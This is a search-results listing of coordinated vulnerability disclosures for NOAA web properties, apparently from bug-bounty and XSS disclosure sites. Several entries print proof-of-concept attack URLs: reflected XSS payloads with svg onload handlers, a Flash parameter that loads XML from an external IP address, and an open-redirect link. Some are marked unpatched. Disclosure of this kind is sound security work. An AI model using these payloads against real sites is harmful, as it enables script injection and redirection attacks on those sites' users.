44 matches found
gis.ngdc.noaa.gov Improper Access Control vulnerability OBB-1372611
Following coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has:       a. verified the vulnerability and confirmed its existence;       b. notified the website operator about its existence...
vlab.ncep.noaa.gov Open Redirect vulnerability
Open Bug Bounty ID: OBB-1145367 Security Researcher myNickName Helped patch 200 vulnerabilities Received 2 Coordinated Disclosure badges , a holder of 2 badges for responsible and coordinated disclosure, found a security vulnerability affecting vlab.ncep.noaa.gov website and its users. Following...
spc.noaa.gov Improper Access Control vulnerability
Security Researcher Nep13371998 Helped patch 562 vulnerabilities Received 4 Coordinated Disclosure badges Received 7 recommendations , a holder of 4 badges for responsible and coordinated disclosure, found a security vulnerability affecting spc.noaa.gov website and its users. Following coordinate...
Friday Squid Blogging: Possible New Squid Species
NOAA video. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
data.nodc.noaa.gov XSS vulnerability
Open Bug Bounty ID: OBB-671285 Description| Value ---|--- Affected Website:| data.nodc.noaa.gov Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...
nco.ncep.noaa.gov XSS vulnerability
Open Bug Bounty ID: OBB-670666 Description| Value ---|--- Affected Website:| nco.ncep.noaa.gov Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...
ready.arl.noaa.gov XSS vulnerability
Open Bug Bounty ID: OBB-668771 Description| Value ---|--- Affected Website:| ready.arl.noaa.gov Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...
tao.ndbc.noaa.gov XSS vulnerability
Open Bug Bounty ID: OBB-660525 Description| Value ---|--- Affected Website:| tao.ndbc.noaa.gov Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...
spc.noaa.gov XSS vulnerability
Open Bug Bounty ID: OBB-659607 Description| Value ---|--- Affected Website:| spc.noaa.gov Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...
tao.ndbc.noaa.gov XSS vulnerability
Open Bug Bounty ID: OBB-444269 Description| Value ---|--- Affected Website:| tao.ndbc.noaa.gov Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...
coastalscience.noaa.gov Open Redirect vulnerability
Open Bug Bounty ID: OBB-401812 Description| Value ---|--- Affected Website:| coastalscience.noaa.gov Vulnerable Application:| Custom Code Vulnerability Type:| Open Redirect / CWE-601 CVSSv3 Score:| 3.4 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N Remediation Guide:| OWASP Open Redirect Cheat Shee...
nws.noaa.gov XSS vulnerability
Vulnerable URL: http://www.nws.noaa.gov/nwr/Maps/error.php?site= Details: Description| Value ---|--- Patched:| Yes, at 25.11.2017 Latest check for patch:| 25.11.2017 10:31 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 1600 VIP website status:| Yes Coordinated...
fim.noaa.gov XSS vulnerability
Vulnerable URL: https://fim.noaa.gov/FIM/Welcome.cgi ?dsKey=fim95jet Details: Description| Value ---|--- Patched:| Yes, at 07.05.2017 Latest check for patch:| 07.05.2017 12:31 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP website...
refbase.arl.noaa.gov XSS vulnerability
Vulnerable URL: http://refbase.arl.noaa.gov/error.php?errorNo=%22%3E%3Csvg/onload=alert/XSSPOSED/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 13:58 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknow...
nhc.noaa.gov Open Redirect vulnerability
Vulnerable URL: http://www.nhc.noaa.gov/nhcexit.php?outurl=https://openbugbounty.org Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| Open Redirect Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP website...
Weather from NOAA free - AWS Credentials, Customized SSL, Dangerous filesystem permissions vulnerabilities
HackApp vulnerability scanner discovered that application Weather from NOAA free published at the 'play' market has multiple vulnerabilities...
externalaffairs.noaa.gov XSS vulnerability
Vulnerable URL: http://www.externalaffairs.noaa.gov/gallery/gallery2/simpleviewer.swf?xmlDataPath=http://45.55.162.179/vuln.xml Details: Description| Value ---|--- Patched:| Yes, at 16.02.2016 Latest check for patch:| 16.02.2016 05:11 GMT Vulnerability type:| XSS Vulnerability status:| Publicly...
ngdc.noaa.gov XSS vulnerability
Open Bug Bounty ID: OBB-115969 Description| Value ---|--- Affected Website:| ngdc.noaa.gov Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...
noaa.gov XSS vulnerability
Vulnerable URL: http://www.noaa.gov/media/exhibits/gallery/gallery1/simpleviewer.swf?xmlDataPath=http://45.55.162.179/vuln.xml Details: Description| Value ---|--- Patched:| Yes, at 07.03.2016 Latest check for patch:| 07.03.2016 05:23 GMT Vulnerability type:| XSS Vulnerability status:| Publicly...
wdtb.noaa.gov XSS vulnerability
Vulnerable URL: http://www.wdtb.noaa.gov/scripts/Catalog/course/index.php?course-list=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 20.09.2016 Latest check for patch:| 20.09.2016 18:29 GMT Vulnerability type:| XSS Vulnerability status:| Public...